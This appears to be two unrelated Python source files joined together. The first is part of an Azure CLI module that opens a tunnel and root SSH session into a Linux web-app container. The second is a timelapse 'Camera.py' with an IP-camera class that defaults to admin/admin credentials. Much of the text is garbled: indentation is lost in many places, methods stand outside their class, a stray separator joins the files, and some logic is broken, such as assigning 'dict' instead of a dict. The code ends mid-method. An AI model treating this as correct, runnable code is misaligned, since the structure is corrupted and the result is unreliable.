    scm_url = _get_scm_url(cmd, resource_group, name)
    credentials = '{}:{}'.format(user_name, password)
    headers = urllib3.util.make_headers(basic_auth=credentials)
    requests.get(scm_url + '/api/settings', headers=headers)
def is_webapp_up(tunnel_server):
    """Return whether the remote web app is reachable through the tunnel server."""
    return tunnel_server.is_webapp_up()
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None):
    """
    Open a local tunnel to a Linux web app's container and attach an interactive
    SSH session over it, blocking until either worker thread exits.

    :param port: local port for the tunnel; None auto-selects a free port.
    :param slot: optional deployment slot name.
    :raises CLIError: when the app is not on a Linux App Service Plan.
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = webapp.reserved
    if not is_linux:
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)
    # fixed credentials of the App Service SSH endpoint inside the container
    ssh_user_name = 'root'
    ssh_user_password = 'Docker!'
    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')
    host_name = name
    if slot is not None:
        host_name += "-" + slot
    tunnel_server = TunnelServer('', port, host_name, profile_user_name, profile_user_password)
    _ping_scm_site(cmd, resource_group_name, name)
    _wait_for_webapp(tunnel_server)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()
    s = threading.Thread(target=_start_ssh_session,
                         args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
    s.daemon = True
    s.start()
    # BUG FIX: Thread.isAlive() was removed in Python 3.9 — use is_alive()
    while s.is_alive() and t.is_alive():
        time.sleep(5)
def _wait_for_webapp(tunnel_server):
    """Block until the web app answers through the tunnel; give up after ~60 tries."""
    attempt = 0
    while not is_webapp_up(tunnel_server):
        if attempt == 0:
            logger.warning('Connection is not ready yet, please wait')
        if attempt == 60:
            raise CLIError("Timeout Error, Unable to establish a connection")
        attempt += 1
        logger.warning('.')
        time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
    """
    Thread target: open an SSH session through the local tunnel, retrying the
    connection for up to ~60 attempts, then run a login shell until it exits.
    """
    attempt = 0
    connection = None
    while connection is None:
        try:
            connection = Connection(host=hostname,
                                    port=port,
                                    user=username,
                                    # connect_timeout=60*10,
                                    connect_kwargs={"password": password})
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if attempt == 0:
                logger.warning('Connection is not ready yet, please wait')
            if attempt == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            attempt += 1
            logger.warning('.')
            time.sleep(1)
    try:
        connection.run('cat /etc/motd', pty=True)
        connection.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        connection.close()
def ssh_webapp(cmd, resource_group_name, name, slot=None):  # pylint: disable=too-many-statements
    """Open an interactive SSH session to a Linux web app (not supported on Windows clients)."""
    import platform
    if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on linux and mac')
    create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=slot)
def create_devops_build(cmd, functionapp_name=None, organization_name=None, project_name=None,
                        overwrite_yaml=None, use_local_settings=None, local_git=None):
    """Interactively set up an Azure DevOps build pipeline for a function app."""
    from .azure_devops_build_iteractive import AzureDevopsBuildInteractive
    interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
                                              organization_name, project_name,
                                              overwrite_yaml, use_local_settings,
                                              local_git)
    return interactive.interactive_azure_devops_build()
|
Camera.py | import datetime
import logging.config
import os
import shutil
import time
import tempfile
import numpy
import requests
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
from xml.etree import ElementTree
from collections import deque
from io import BytesIO
import threading
from threading import Thread, Event, Lock
from libs.SysUtil import SysUtil
import cv2
try:
logging.config.fileConfig("logging.ini")
logging.getLogger("paramiko").setLevel(logging.WARNING)
except:
pass
try:
# import yaml module and assert that it has a load function
import yaml
assert yaml.load
except Exception as e:
logging.error("Couldnt import suitable yaml module, no IP camera support: {}".format(str(e)))
try:
import gphoto2cffi as gp
except Exception as e:
logging.error("Couldnt import gphoto2-cffi module, no DSLR support: {}".format(str(e)))
try:
import picamera
import picamera.array
except Exception as e:
logging.error("Couldnt import picamera module, no picamera camera support: {}".format(str(e)))
pass
USBDEVFS_RESET = 21780
def nested_lookup(key, document):
    """
    Recursively yield every value stored under *key* anywhere inside a nested
    structure of dicts and lists.

    :param key: string of key to lookup
    :param document: dict or list to lookup
    :return: yields matching values
    """
    if isinstance(document, list):
        for item in document:
            yield from nested_lookup(key, item)
    elif isinstance(document, dict):
        for k, v in document.items():
            if k == key:
                yield v
            elif isinstance(v, (dict, list)):
                # descend into nested containers (lists handled by the branch above)
                yield from nested_lookup(key, v)
class Camera(object):
    """
    Base Camera class.
    :cvar int accuracy: 3: Number of seconds capture should be accurate to.
    :cvar int default_width: 1080: Default width of resized images.
    :cvar int default_height: 720: Default height of resized images.
    :cvar list file_types: ["CR2", "RAW", "NEF", "JPG", "JPEG", "PPM", "TIF", "TIFF"]: Supported output image types.
    :cvar list output_types: ["tif", "jpg"]: Output image types, ignored by GPCamera.
    :ivar collections.deque communication_queue: Reference to a deque, or a deque.
    :ivar logging.Logger logger: Logger for each Camera.
    :ivar threading.Event stopper: Stopper event object to allow thread stopping.
    :ivar str identifier: Unique identifier for the camera. Used to distinguish cameras from one another.
    :ivar list failed: List of failed capture timepoints.
    :ivar str config_filename: Configuration file path, unused if camera is instantiated with the noconf init parameter.
    :ivar configparser.ConfigParser config: Configuration object.
    :ivar str camera_name: Human friendly name of the camera.
    :ivar int interval: Capture interval (in seconds).
    :ivar str spool_directory: Path to stream images into during the capture process.
    :ivar str upload_directory: Path to move images to after the capture process.
    :ivar datetime.time begin_capture: Naive start time for capture.
    :ivar datetime.time end_capture: Naive end time for capture.
    :ivar datetime.datetime current_capture_time: When the capture process began.
    """
    accuracy = 3
    default_width, default_height = 1080, 720
    file_types = ["CR2", "RAW", "NEF", "JPG", "JPEG", "PPM", "TIF", "TIFF"]
    output_types = ["tif", 'jpg']
    # class-level live-view stream state: one background thread and its latest
    # encoded frame are shared by all instances of a given Camera subclass
    _frame = None
    _thread = None
    _last_access = None
def init_stream(self):
    """
    Start the background video stream thread if it isn't already running,
    blocking until the first frame becomes available.
    """
    cls = self.__class__
    if cls._thread is None:
        # start background frame thread
        cls._thread = threading.Thread(target=self.stream_thread)
        cls._thread.start()
        # wait until frames start to be available
        while cls._frame is None:
            time.sleep(0.01)
def get_frame(self) -> bytes:
    """
    Return the latest encoded frame from the running :func:`stream_thread`,
    starting the stream first if necessary.
    :return: encoded image data as bytes.
    """
    cls = self.__class__
    # record client activity so the stream thread knows it is still wanted
    cls._last_access = time.time()
    self.init_stream()
    return cls._frame
@classmethod
def stream_thread(cls):
    """
    Boilerplate stream thread.
    Override this with the correct method of opening the camera, grabbing image data and closing the camera.
    """
    # NOTE(review): this is a non-functional placeholder — the local get_camera()
    # below returns None, so the `with` statement would fail at runtime;
    # subclasses are expected to override this whole method.
    print("Unimplemented classmethod call: stream_thread")
    print("You should not create a Camera object directly")

    def get_camera():
        # stub standing in for "open the real camera as a context manager"
        pass

    with get_camera() as camera:
        # let camera warm up
        while True:
            # example, you actually need to get the data from somewhere.
            cls._frame = camera.get_frame().read()
            # if there hasn't been any clients asking for frames in
            # the last 10 seconds stop the thread
            if time.time() - cls._last_access > 10:
                break
    # clear the thread handle so init_stream() can restart the stream later
    cls._thread = None
def __init__(self, identifier: str = None, queue: deque = None, noconf: bool = False, **kwargs):
    """
    Initialiser for cameras...
    :param identifier: unique identifier for this camera, MANDATORY
    :param queue: deque to push info into
    :param noconf: dont create a config, or watch anything. Used for temporarily streaming from a camera
    :param kwargs:
    """
    if queue is None:
        # bounded deque so a stalled consumer can't grow memory unboundedly
        queue = deque(tuple(), 256)
    self.communication_queue = queue
    self.logger = logging.getLogger(identifier)
    self.stopper = Event()
    self.identifier = identifier
    # human-friendly name defaults to the identifier; re_init() overwrites it from config
    self.camera_name = identifier
    self.failed = list()
    self._exif = dict()
    self.focus_position = None
    self._frame = None
    # pre-allocated image buffer
    # NOTE(review): allocated as (width, height, 3); most cv2 code expects
    # (height, width, 3) — confirm the intended axis order
    self._image = numpy.empty((Camera.default_width, Camera.default_height, 3), numpy.uint8)
    if not noconf:
        self.config_filename = SysUtil.identifier_to_ini(self.identifier)
        # chained assignment: set every config-derived attribute to None first,
        # then let re_init() populate them from the config file.
        # (begin_capture/end_capture appear twice in the chain; harmless duplication.)
        self.config = \
            self.camera_name = \
            self.interval = \
            self.upload_directory = \
            self.begin_capture = \
            self.end_capture = \
            self.begin_capture = \
            self.end_capture = \
            self.current_capture_time = None
        self.re_init()
def re_init(self):
    """
    Re-initialisation method for updating configuration values.
    The signature for this method is provided to :func:`libs.SysUtil.SysUtil.add_watch`, which calls it
    when the config file has been modified.
    Loads all the configuration values from the config file into the Camera object.
    """
    self.logger.info("Re-init...")
    self.config = SysUtil.ensure_config(self.identifier)
    self.camera_name = self.config["camera"]["name"]
    self.interval = self.config.getint("timelapse", "interval")
    self.upload_directory = self.config["localfiles"]["upload_dir"]
    # defaults used when the configured times cannot be parsed
    self.begin_capture = datetime.time(0, 0)
    self.end_capture = datetime.time(23, 59)
    start_time_string = str(self.config['timelapse']['starttime']).replace(":", "")
    end_time_string = str(self.config['timelapse']['stoptime']).replace(":", "")
    try:
        # cut string to max of 4.
        start_time_string = start_time_string[:4]
        # BUG FIX: validate the *start* string — the original asserted on
        # end_time_string here, so a bad start time slipped through.
        assert start_time_string.isdigit(), "Non numerical start time, {}".format(str(start_time_string))
        self.begin_capture = datetime.datetime.strptime(start_time_string, "%H%M").time()
    except Exception as e:
        # BUG FIX: was "...".format_map(str(e)), which raises TypeError
        # (format_map needs a mapping); use .format
        self.logger.error("Time conversion error starttime - {}".format(str(e)))
    try:
        # cut string to max of 4.
        end_time_string = end_time_string[:4]
        assert end_time_string.isdigit(), "Non numerical end time, {}".format(str(end_time_string))
        self.end_capture = datetime.datetime.strptime(end_time_string, "%H%M").time()
    except Exception as e:
        self.logger.error("Time conversion error stoptime - {}".format(str(e)))
    try:
        if not os.path.exists(self.upload_directory):
            self.logger.info("Creating upload dir {}".format(self.upload_directory))
            os.makedirs(self.upload_directory)
    except Exception as e:
        self.logger.error("Creating directories {}".format(str(e)))
    self._exif = self.get_exif_fields()
    self.current_capture_time = datetime.datetime.now()
def capture_image(self, filename: str = None) -> numpy.array:
"""
Camera capture method.
override this method when creating a new type of camera.
Behavior:
- if filename is a string, write images to disk as filename.ext, and return the names of the images written sucessfully.
- if filename is None, it will set the instance attribute `_image` to a numpy array of the image and return that.
:param filename: image filename without extension
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array
"""
return self._image
def capture(self, filename: str = None) -> numpy.array:
"""
capture method, only extends functionality of :func:`Camera.capture` so that testing with can happen
Camera.capture = Camera.capture_monkey
For extending the Camera class override the Camera.capture_image method, not this one.
:param filename: image filename without extension
:return: :func:`numpy.array` if filename not specified, otherwise list of files.
:rtype: numpy.array
"""
if filename:
dirname = os.path.dirname(filename)
os.makedirs(dirname, exist_ok=True)
return self.capture_image(filename=filename)
def capture_monkey(self, filename: str = None) -> numpy.array:
    """
    Chaos-testing capture: simulates things going horribly wrong.
    Will sometimes return None, an empty list or an invalid filename;
    sometimes raises a generic Exception; otherwise captures a valid image.
    :param filename: image filename without extension
    :return: :func:`numpy.array` if filename not specified, otherwise list of files.
    :rtype: numpy.array
    """
    self.logger.warning("Capturing with a naughty monkey.")
    import random
    roll = random.uniform(0, 100)
    if roll < 10:
        # return nothing
        return None
    if 10 <= roll <= 20:
        # return empty list
        return []
    if 20 <= roll <= 30:
        # return an invalid list of no files
        return ["Ooh ooh, ahh ahhh!"]
    if 30 <= roll <= 40:
        # raise an uncaught exception
        raise Exception("BANANAS")
    if 40 <= roll <= 50:
        # return some random bytes
        return bytes(b'4')
    if 50 <= roll <= 60:
        # return a string
        return "Feed me!"
    return self.capture_image(filename=filename)
@property
def exif(self) -> dict:
"""
Gets the current exif data, sets the exif datetime field to now.
:return: dictionary of exif fields and their values.
:rtype: dict
"""
self._exif["Exif.Photo.DateTimeOriginal"] = datetime.datetime.now()
return self._exif
@property
def image(self) -> numpy.array:
"""
Gets the current image (last image taken and stored) as a numpy.array.
:return: numpy array of the currently stored image.
:rtype: numpy.array
"""
return self._image
@staticmethod
def timestamp(tn: datetime.datetime) -> str:
"""
Creates a properly formatted timestamp from a datetime object.
:param tn: datetime to format to timestream timestamp string
:return: formatted timestamp.
"""
return tn.strftime('%Y_%m_%d_%H_%M_%S')
@staticmethod
def time2seconds(t: datetime.datetime) -> int:
"""
Converts a datetime to an integer of seconds since epoch
:return: integer of seconds since 1970-01-01
:rtype: int
"""
try:
return int(t.timestamp())
except:
# the 'timestamp()' method is only implemented in python3.3`
# this is an old compatibility thing
return int(t.hour * 60 * 60 + t.minute * 60 + t.second)
@property
def timestamped_imagename(self) -> str:
"""
Builds a timestamped image basename without extension from :func:`Camera.current_capture_time`
:return: image basename
:rtype: str
"""
return '{camera_name}_{timestamp}'.format(camera_name=self.camera_name,
timestamp=Camera.timestamp(self.current_capture_time))
@property
def time_to_capture(self) -> bool:
"""
Filters out times for capture.
returns True by default.
returns False if the conditions where the camera should capture are NOT met.
:return: whether or not it is time to capture
:rtype: bool
"""
current_naive_time = self.current_capture_time.time()
if not self.config.getboolean("camera", "enabled"):
# if the camera is disabled, never take photos
return False
if self.begin_capture < self.end_capture:
# where the start capture time is less than the end capture time
if not self.begin_capture <= current_naive_time <= self.end_capture:
return False
else:
# where the start capture time is greater than the end capture time
# i.e. capturing across midnight.
if self.end_capture <= current_naive_time <= self.begin_capture:
return False
# capture interval
if not (self.time2seconds(self.current_capture_time) % self.interval < Camera.accuracy):
return False
return True
def get_exif_fields(self) -> dict:
"""
Get default fields for exif dict, this should be overriden and super-ed if you want to add custom exif tags.
:return: exif fields
:rtype: dict
"""
exif = dict()
exif['Exif.Image.Make'] = "Make"
exif['Exif.Image.Model'] = "Model"
exif['Exif.Image.CameraSerialNumber'] = self.identifier
return exif
def encode_write_np_array(self, np_image_array: numpy.array, fn: str) -> list:
    """
    Write an RGB numpy image array (cv2-style) to disk once per configured
    output type, then attempt to attach exif metadata to each written file.
    :param numpy.array np_image_array: 3 dimensional image array, x,y,rgb
    :param str fn: filename
    :return: files successfully written.
    :rtype: list(str)
    """
    # output types must be valid!
    base = os.path.splitext(fn)[0]
    written = list()
    for ext in Camera.output_types:
        target = "{}.{}".format(base, ext)
        if not cv2.imwrite(target, np_image_array):
            continue
        written.append(target)
        try:
            # set exif data
            import pyexiv2
            meta = pyexiv2.ImageMetadata(target)
            meta.read()
            for tag, value in self.exif.items():
                try:
                    meta[tag] = value
                except:
                    pass
            meta.write()
        except Exception as e:
            self.logger.debug("Couldnt write the appropriate metadata: {}".format(str(e)))
    return written
@staticmethod
def _write_raw_bytes(image_bytesio: BytesIO, fn: str) -> list:
"""
Writes a BytesIO object to disk.
:param image_bytesio: bytesio of an image.
:param fn:
:return: file name
"""
with open(fn, 'wb') as f:
f.write(image_bytesio.read())
# no exif data when writing the purest bytes :-P
return fn
def stop(self):
"""
Stops the capture thread, if self is an instance of :class:`threading.Thread`.
"""
self.stopper.set()
def focus(self):
"""
AutoFocus trigger method.
Unimplemented.
"""
pass
def communicate_with_updater(self):
"""
Inter-thread communication method.
Communicates with this objects :class:`libs.Updater.Updater` by keeping a reference to its member
'communication_queue' and appending this objects current state to the queue.
"""
try:
data = dict(
name=self.camera_name,
identifier=self.identifier,
failed=self.failed,
last_capture=int(self.current_capture_time.strftime("%s")))
# append our data dict to the communication_queue deque.
self.communication_queue.append(data)
self.failed = list()
except Exception as e:
self.logger.error("Inter-thread communication error: {}".format(str(e)))
def run(self):
    """
    Main loop: continuously captures images at the configured interval and
    stages them for upload, until :func:`stop` sets the stopper event.
    """
    while not self.stopper.is_set():
        self.current_capture_time = datetime.datetime.now()
        # checking if enabled and other stuff
        if self.__class__._thread is not None:
            self.logger.critical("Camera live view thread is not closed, camera lock cannot be acquired.")
            # BUG FIX: the bare `continue` busy-spun at 100% CPU (and spammed the
            # log) while the live-view thread was open; back off briefly instead.
            time.sleep(1)
            continue
        if self.time_to_capture:
            try:
                start_capture_time = time.time()
                raw_image = self.timestamped_imagename
                self.logger.info("Capturing for {}".format(self.identifier))
                with tempfile.TemporaryDirectory(prefix=self.camera_name) as spool:
                    files = self.capture(filename=os.path.join(spool, raw_image))
                    # capture. if capture didnt happen dont continue with the rest.
                    if len(files) == 0:
                        self.failed.append(self.current_capture_time)
                        continue
                    if self.config.getboolean("ftp", "replace"):
                        st = time.time()
                        resize_t = 0.0
                        if self.config.getboolean("ftp", "resize"):
                            self._image = cv2.resize(self._image, (Camera.default_width, Camera.default_height),
                                                     interpolation=cv2.INTER_NEAREST)
                            resize_t = time.time() - st
                        # stamp the image name onto the preview image
                        cv2.putText(self._image,
                                    self.timestamped_imagename,
                                    org=(20, self._image.shape[0] - 20),
                                    fontFace=cv2.FONT_HERSHEY_SIMPLEX,
                                    fontScale=1,
                                    color=(0, 0, 255),
                                    thickness=2,
                                    lineType=cv2.LINE_AA)
                        cv2.imwrite(os.path.join("/dev/shm", self.identifier + ".jpg"), self._image)
                        shutil.copy(os.path.join("/dev/shm", self.identifier + ".jpg"),
                                    os.path.join(self.upload_directory, "last_image.jpg"))
                        # BUG FIX: format used {0} twice, so the total time was
                        # never printed (the resize time appeared in both slots)
                        self.logger.info("Resize {0:.3f}s, total: {1:.3f}s".format(resize_t, time.time() - st))
                    # copying/renaming for files: flatten any nested lists of filenames
                    oldfiles = files[:]
                    files = []
                    for fn in oldfiles:
                        if type(fn) is list:
                            files.extend(fn)
                        else:
                            files.append(fn)
                    for fn in files:
                        # move files to the upload directory
                        try:
                            if self.config.getboolean("ftp", "timestamped"):
                                shutil.move(fn, self.upload_directory)
                                self.logger.info("Captured & stored for upload - {}".format(os.path.basename(fn)))
                        except Exception as e:
                            self.logger.error("Couldn't move for timestamped: {}".format(str(e)))
                        # remove the spooled files that remain
                        try:
                            if os.path.isfile(fn):
                                self.logger.info("File remaining in spool directory, removing: {}".format(fn))
                                os.remove(fn)
                        except Exception as e:
                            self.logger.error("Couldn't remove spooled when it still exists: {}".format(str(e)))
                # log total capture time
                self.logger.info("Total capture time: {0:.2f}s".format(time.time() - start_capture_time))
                # communicate our success with the updater
                self.communicate_with_updater()
                # sleep for a little bit so we dont try and capture again so soon.
                time.sleep(Camera.accuracy * 2)
            except Exception as e:
                self.logger.critical("Image Capture error - {}".format(str(e)))
        time.sleep(0.1)
class IPCamera(Camera):
    """
    IPCamera, unfinished and untested.
    TODO: needs work to support both yml config and normal configs
    """

    def __init__(self, identifier=None, ip=None, config=None, queue=None, **kwargs):
        """
        Initialise an IP camera from a plain config dict (not a ConfigParser).
        :param identifier: unique identifier for this camera
        :param ip: camera ip address; overrides the config value when given
        :param config: dict of camera settings
        :param queue: deque to push status info into
        """
        if not config:
            config = dict()
        self.config = config.copy()
        self.communication_queue = queue or deque(tuple(), 256)
        self.return_parser = config.get("return_parser", "plaintext")
        self.logger = logging.getLogger(identifier)
        self.stopper = Event()
        self.identifier = identifier
        self.camera_name = config.get("camera_name", identifier)
        self.interval = int(config.get("interval", 300))
        self.upload_directory = config.get("upload_dir", os.path.join(os.getcwd(), identifier))
        # defaults used when the configured times cannot be parsed
        self.begin_capture = datetime.time(0, 0)
        self.end_capture = datetime.time(23, 59)
        start_time_string = str(self.config.get('starttime', "00:00")).replace(":", "")
        end_time_string = str(self.config.get('stoptime', "23:59")).replace(":", "")
        try:
            # cut string to max of 4.
            start_time_string = start_time_string[:4]
            # BUG FIX: validate the *start* string — the original asserted on
            # end_time_string here, so a bad start time slipped through.
            assert start_time_string.isdigit(), "Non numerical start time, {}".format(str(start_time_string))
            self.begin_capture = datetime.datetime.strptime(start_time_string, "%H%M").time()
        except Exception as e:
            # BUG FIX: was "...".format_map(str(e)), which raises TypeError; use .format
            self.logger.error("Time conversion error starttime - {}".format(str(e)))
        try:
            # cut string to max of 4.
            end_time_string = end_time_string[:4]
            assert end_time_string.isdigit(), "Non numerical end time, {}".format(str(end_time_string))
            self.end_capture = datetime.datetime.strptime(end_time_string, "%H%M").time()
        except Exception as e:
            self.logger.error("Time conversion error stoptime - {}".format(str(e)))
        self.failed = list()
        self._image = numpy.empty((Camera.default_width, Camera.default_height, 3), numpy.uint8)
        try:
            if not os.path.exists(self.upload_directory):
                self.logger.info("Creating upload dir {}".format(self.upload_directory))
                os.makedirs(self.upload_directory)
        except Exception as e:
            self.logger.error("Creating directories {}".format(str(e)))
        self._exif = self.get_exif_fields()
        self.current_capture_time = datetime.datetime.now()
        # NOTE(review): overwrites the numpy buffer allocated above — confirm intended
        self._image = None
        self._notified = []
        format_str = config.get("format_url", "http://{HTTP_login}@{ip}{command}")
        self.auth_type = config.get("auth_type", "basic")
        self.auth_object = None
        if format_str.startswith("http://{HTTP_login}@"):
            # strip the inline credential placeholder and use header-based auth instead
            format_str = format_str.replace("{HTTP_login}@", "")
            self.auth_object = HTTPBasicAuth(config.get("username", "admin"),
                                             config.get("password", "admin"))
            self.auth_object_digest = HTTPDigestAuth(config.get("username", "admin"),
                                                     config.get("password", "admin"))
            self.auth_object = self.auth_object_digest if self.auth_type == "digest" else self.auth_object
        self._HTTP_login = config.get("HTTP_login", "{user}:{password}").format(
            user=config.get("username", "admin"),
            password=config.get("password", "admin"))
        self._url = format_str.format(
            ip=ip or config.get("ip", "192.168.1.7"),
            HTTP_login=self._HTTP_login,
            command="{command}")
        self._image_size_list = config.get("image_size_list", [[1920, 1080], [1280, 720], [640, 480]])
        self._image_size = config.get("image_size", self._image_size_list[0])
        self._image_quality = config.get("image_quality", 100)
        # no autofocus modes by default.
        self._autofocus_modes = config.get("autofocus_modes", [])
        self._hfov_list = config.get("horizontal_fov_list",
                                     [71.664, 58.269, 47.670, 40.981, 33.177, 25.246, 18.126, 12.782, 9.217, 7.050,
                                      5.82])
        self._vfov_list = config.get("vertical_fov_list",
                                     [39.469, 33.601, 26.508, 22.227, 16.750, 13.002, 10.324, 7.7136, 4.787, 3.729,
                                      2.448])
        self._hfov = self._vfov = None
        self._zoom_list = config.get("zoom_list", [50, 150, 250, 350, 450, 550, 650, 750, 850, 950, 1000])
        self._focus_range = config.get("focus_range", [1, 99999])
        # set commands from the rest of the config.
        self.command_urls = config.get('urls', {})
        self.return_keys = config.get("keys", {})
        # NOTE(review): self-assignment presumably triggers an `image_quality`
        # property setter defined further down the class — confirm before removing.
        self.image_quality = self.image_quality
        super(IPCamera, self).__init__(identifier, **kwargs)
        self.logger.info(self.status)
def _make_request(self, command_string, *args, **kwargs):
    """
    Makes a generic request, formatting the command string and applying the authentication.

    Formats *command_string* into the camera url template, promotes the first
    "&" to "?" when the template only supplies "&"-separated parameters, and
    GETs the result with a 60 second timeout. On a 401 the request is retried
    once with digest auth.

    :param command_string: command string like read stream raw
    :type command_string: str
    :param args: positional arguments for formatting the url template
    :param kwargs: keyword arguments for formatting the url template
    :return: the requests response on HTTP 200/204, otherwise None
    """
    url = self._url.format(*args, command=command_string, **kwargs)
    # a url needs "?" before its first query parameter; some command
    # templates only use "&", so fix up the first separator.
    if "&" in url and "?" not in url:
        url = url.replace("&", "?", 1)
    response = None
    try:
        response = requests.get(url, timeout=60, auth=self.auth_object)
        if response.status_code == 401:
            # basic auth rejected -- retry the same request with digest auth.
            self.logger.debug("Auth is not basic, trying digest")
            response = requests.get(url, timeout=60, auth=self.auth_object_digest)
        if response.status_code not in [200, 204]:
            self.logger.error(
                "[{}] - {}\n{}".format(str(response.status_code), str(response.reason), str(response.url)))
            return
        return response
    except Exception as e:
        # network failures are logged and swallowed; callers treat None as failure.
        self.logger.error("Some exception got raised {}".format(str(e)))
        return
def _read_stream(self, command_string, *args, **kwargs):
    """
    Perform a camera request and return the response body as text.

    :param command_string: url command (with optional format parameters)
    :type command_string: str
    :return: decoded response text, or None when the request failed
    """
    resp = self._make_request(command_string, *args, **kwargs)
    return resp.text if resp is not None else None
def _read_stream_raw(self, command_string, *args, **kwargs):
    """
    Perform a camera request and return the raw response bytes.

    :param command_string: url command (with optional format parameters)
    :type command_string: str
    :return: raw response content as bytes, or None when the request failed
    """
    resp = self._make_request(command_string, *args, **kwargs)
    return resp.content if resp is not None else None
def _get_cmd(self, cmd):
    """
    Look up the url template and the expected return keys for a command.

    Fix: the original appended ``cmd_str`` (always falsy here) to
    ``self._notified`` instead of the command name, so after the first
    missing command the guard stopped matching and the function fell
    through, returning ``(None, keys)`` for commands with no url.

    :param cmd: logical command name, e.g. "get_image"
    :return: tuple of (url template or None, list of return keys)
    """
    cmd_str = self.command_urls.get(cmd, None)
    if not cmd_str:
        # warn once per missing command, then always signal "no command".
        if cmd not in self._notified:
            print("No command available for \"{}\"".format(cmd))
            self._notified.append(cmd)
        return None, None
    keys = self.return_keys.get(cmd, [])
    # normalise a single key to a list so callers can always iterate.
    if type(keys) not in (list, tuple):
        keys = [keys]
    return cmd_str, keys
@staticmethod
def get_value_from_xml(message_xml, *args):
"""
gets float, int or string values from a xml string where the key is the tag of the first element with value as
text.
:param message_xml: the xml to searach in.
:param args: list of keys to find values for.
:rtype: dict
:return: dict of arg: value pairs requested
"""
return_values = dict()
if not len(args):
return return_values
if not len(message_xml):
return return_values
# apparently, there is an issue parsing when the ptz returns INVALID XML (WTF?)
# these seem to be the tags that get mutilated.
illegal = ['\n', '\t', '\r',
"<CPStatusMsg>", "</CPStatusMsg>", "<Text>",
"</Text>", "<Type>Info</Type>", "<Type>Info",
"Info</Type>", "</Type>", "<Type>"]
for ill in illegal:
message_xml = message_xml.replace(ill, "")
root_element = ElementTree.Element("invalidation_tag")
try:
root_element = ElementTree.fromstring(message_xml)
except Exception as e:
print(str(e))
print("Couldnt parse XML!!!")
print(message_xml)
return_values = dict
for key in args:
target_ele = root_element.find(key)
if target_ele is None:
continue
value = target_ele.text.replace(' ', '')
if value is None:
continue
types = [float, int, str]
for t in types:
try:
return_values[key] = t(value)
break
except ValueError:
pass
else:
print("Couldnt cast an xml element text attribute to str. What are you feeding the xml parser?")
return return_values
@staticmethod
def get_value_from_plaintext(message, *args):
"""
gets float, int or string values from a xml string where the key is the tag of the first element with value as
text.
:param message:
:param args: list of keys to find values for.
:rtype: dict
:return: dict of arg: value pairs requested
"""
return_values = dict()
if not len(args):
return return_values
if not len(message):
return return_values
for line in message.split("\n"):
line = line.replace("= ", "=").replace(" =", "=").strip()
name, value = line.partition("=")[::2]
name, value = name.strip(), value.strip()
types = [float, int, str]
if name in args:
for t in types:
try:
v = t(value)
if str(v).lower() in ['yes', 'no', 'true', 'false', 'on', 'off']:
v = str(v).lower() in ['yes', 'true', 'on']
return_values[name] = v
break
except ValueError:
pass
else:
print("Couldnt cast an plaintext element text attribute to str. What are you feeding the parser?")
return return_values
def get_value_from_stream(self, stream, *keys):
    """
    Parse key/value pairs out of camera response data.

    Dispatches on ``self.return_parser`` to either the plaintext or xml
    parser; any other parser name yields an empty dict.

    :param stream: text data to search for values
    :type stream: str
    :param keys: keys to extract
    :return: dict of key: value pairs
    :rtype: dict
    """
    parser = self.return_parser
    if parser == 'plaintext':
        return self.get_value_from_plaintext(stream, *keys)
    if parser == 'xml':
        return self.get_value_from_xml(stream, *keys)
    return dict()
def capture_image(self, filename=None) -> numpy.array:
    """
    Captures an image with the IP camera, uses requests.get to acquire the image.

    Fixes: the ``"{width}" in cmd`` check ran before the ``not cmd`` guard
    (TypeError when no command is configured); the height substitution used
    the I/O-triggering ``image_size`` property instead of the cached
    ``_image_size``; deprecated ``numpy.fromstring`` replaced with
    ``numpy.frombuffer``; removed the unused ``url`` local.

    :param filename: filename without extension to capture to.
    :return: list of filenames (of captured images) if filename was specified, otherwise a numpy array of the image.
    :rtype: numpy.array or list
    """
    st = time.time()
    cmd, keys = self._get_cmd("get_image")
    if not cmd:
        self.logger.error("No capture command, this is wrong...")
        return self._image
    # substitute resolution placeholders when the url template has them.
    if "{width}" in cmd and "{height}" in cmd:
        cmd = cmd.format(width=self._image_size[0], height=self._image_size[1])
    for x in range(10):
        try:
            # fast method: fetch the encoded image bytes and decode in memory.
            data = self._read_stream_raw(cmd)
            buf = numpy.frombuffer(data, numpy.uint8)
            self._image = cv2.imdecode(buf, cv2.IMREAD_COLOR)
            if filename:
                rfiles = self.encode_write_np_array(self._image, filename)
                self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
                return rfiles
            self.logger.debug("Took {0:.2f}s to capture".format(time.time() - st))
            break
        except Exception as e:
            self.logger.error("Capture from network camera failed {}".format(str(e)))
            time.sleep(0.2)
    else:
        self.logger.error("All capture attempts (10) for network camera failed.")
    return self._image
# def set_fov_from_zoom(self):
# self._hfov = numpy.interp(self._zoom_position, self.zoom_list, self.hfov_list)
# self._vfov = numpy.interp(self._zoom_position, self.zoom_list, self.vfov_list)
@property
def image_quality(self) -> float:
    """
    Image quality as a percentage (1-100).

    :getter: cached value, no camera round-trip.
    :setter: sent to the camera.
    :rtype: float
    """
    return self._image_quality
@image_quality.setter
def image_quality(self, value: float):
    """Send the image quality percentage (1-100) to the camera if configured."""
    # NOTE(review): assert is stripped under python -O; a ValueError would be
    # a more robust validation here.
    assert (1 <= value <= 100)
    # NOTE(review): this looks up the "get_image_quality" command url to SET
    # the quality -- presumably the config maps the set-url under that key;
    # verify it should not be "set_image_quality".
